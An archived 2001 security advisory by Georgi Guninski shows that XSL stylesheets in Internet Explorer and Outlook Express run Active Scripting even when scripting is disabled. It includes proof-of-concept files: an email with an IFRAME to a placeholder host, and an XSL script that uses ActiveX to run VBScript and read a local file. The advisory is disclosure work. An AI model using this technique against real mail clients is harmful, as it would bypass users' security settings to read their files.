what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

iexslt.txt

iexslt.txt
Posted Apr 21, 2001
Authored by Georgi Guninski | Site guninski.com

Georgi Guninski security advisory #43, 2001 - It is possible to execute Active Scripting with the help of XML and XSL even if Active Scripting is disabled in all security zones. This is especially dangerous in email messages. Though this is not typical exploit itself, it may be used in other exploits especially in email. To use the demonstration, disable Active Scripting and click here. If you see any message box you are vulnerable.

tags | exploit
SHA-256 | c7fe5497623b82391c2f6f8c4e0d6f0cddd8405282c73ba789be9d2a1a709bdc

iexslt.txt

Change Mirror Download
   guninski@guninski.com Georgi Guninski security advisory #43, 2001

XML scripting in IE, Outlook Express

Systems affected:
Internet Explorer 5.x - including full patched up to now though Microsoft cannot
reproduce the problem on fully patched IE 5.x ,Outlook Express (probably Outlook have not
tested)

Risk: High
Date: 20 April 2001

Legal Notice:
This Advisory is Copyright (c) 2001 Georgi Guninski. You may distribute it unmodified.
You may not modify it and distribute it or distribute parts of it without the author's
written permission.

Disclaimer:
The information in this advisory is believed to be true based on experiments though it may be
false.
The opinions expressed in this advisory and program are my own and not of any company.
The usual standard disclaimer applies, especially the fact that Georgi Guninski
is not liable for any damages caused by direct or indirect use of the information
or functionality provided by this advisory or program.
Georgi Guninski bears no responsibility for content or misuse of this advisory or program or
any derivatives thereof.

Background:
We have some disagreement with Microsoft whether this works on fully patched IE 5.x.
I believe I am running fully patched IE according to the rules for patching in
Microsoft's security bulletins.
The problem seems to be the version of WSH which is described in MS-01-015 at:
http://www.microsoft.com/technet/security/bulletin/ms01-015.asp
To check whether you are vulnerable check DEMONSTRATION.

Description:

It is possible to execute Active Scripting with the help of XML and XSL even if
Active Scripting is disabled in all security zones. This is especially dangerous in
email messages. Though this is not typical exploit itself, it may be used in other
exploits especially in email.

Details:

The problem are xml stylesheets which may contain Active Scripting and they are executed
regardless of the settings for Active Scripting in IE/Outlook Express.
Below is a demonstration which executes Active Scripting which contains the demo from
my advisory #41.
When xstyle.eml is viewed with IE or OE the Active Script in it is executed regardless of
user's settings.

--xstyle.eml--------------------------------------------------------------
....
<IFRAME SRC="http://SOMEHOST/xstyle.xml"></IFRAME>
....
--------------------------------------------------------------------------

--xstyle.xml--------------------------------------------------------------
<?xml version="1.0"?>
<?xml-stylesheet type="text/xsl" href="xstyle.xsl" ?>
<doc>
style
</doc>
--------------------------------------------------------------------------

--xstyle.xsl--------------------------------------------------------------
<xsl:stylesheet xmlns:xsl="http://www.w3.org/TR/WD-xsl">
<xsl:script>
<![CDATA[
a=new ActiveXObject('htmlfile');
a.open();
a.write("<html><body>gg</body></html>");
a.close();
v=new ActiveXObject("MSScriptControl.ScriptControl.1");
v.Language="VBScript";
v.eval('MsgBox ("This is VBSCRIPT",65,"This is VBSCRIPT")');
x=v.eval('GetObject("C:/test.txt","htmlfile")');
v.eval('MsgBox ("Hi",65,"Hi")');
a.location="about:Here is your file <BR>"+x.body.innerHTML;
]]>
</xsl:script>
</xsl:stylesheet>
--------------------------------------------------------------------------

Workaround: I do not know of workaround but Microsoft claims updating WSH solves the issue.

Demonstration:
http://www.guninski.com/xstyle.eml - disable Active Scripting and if you see any
message box you are vulnerable.

Vendor status:
Microsoft was informed on 18 April 2001

Regards,
Georgi Guninski
http://www.guninski.com

Login or Register to add favorites

File Archive:

July 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Jul 1st
    27 Files
  • 2
    Jul 2nd
    10 Files
  • 3
    Jul 3rd
    35 Files
  • 4
    Jul 4th
    27 Files
  • 5
    Jul 5th
    18 Files
  • 6
    Jul 6th
    0 Files
  • 7
    Jul 7th
    0 Files
  • 8
    Jul 8th
    28 Files
  • 9
    Jul 9th
    44 Files
  • 10
    Jul 10th
    24 Files
  • 11
    Jul 11th
    25 Files
  • 12
    Jul 12th
    11 Files
  • 13
    Jul 13th
    0 Files
  • 14
    Jul 14th
    0 Files
  • 15
    Jul 15th
    0 Files
  • 16
    Jul 16th
    0 Files
  • 17
    Jul 17th
    0 Files
  • 18
    Jul 18th
    0 Files
  • 19
    Jul 19th
    0 Files
  • 20
    Jul 20th
    0 Files
  • 21
    Jul 21st
    0 Files
  • 22
    Jul 22nd
    0 Files
  • 23
    Jul 23rd
    0 Files
  • 24
    Jul 24th
    0 Files
  • 25
    Jul 25th
    0 Files
  • 26
    Jul 26th
    0 Files
  • 27
    Jul 27th
    0 Files
  • 28
    Jul 28th
    0 Files
  • 29
    Jul 29th
    0 Files
  • 30
    Jul 30th
    0 Files
  • 31
    Jul 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close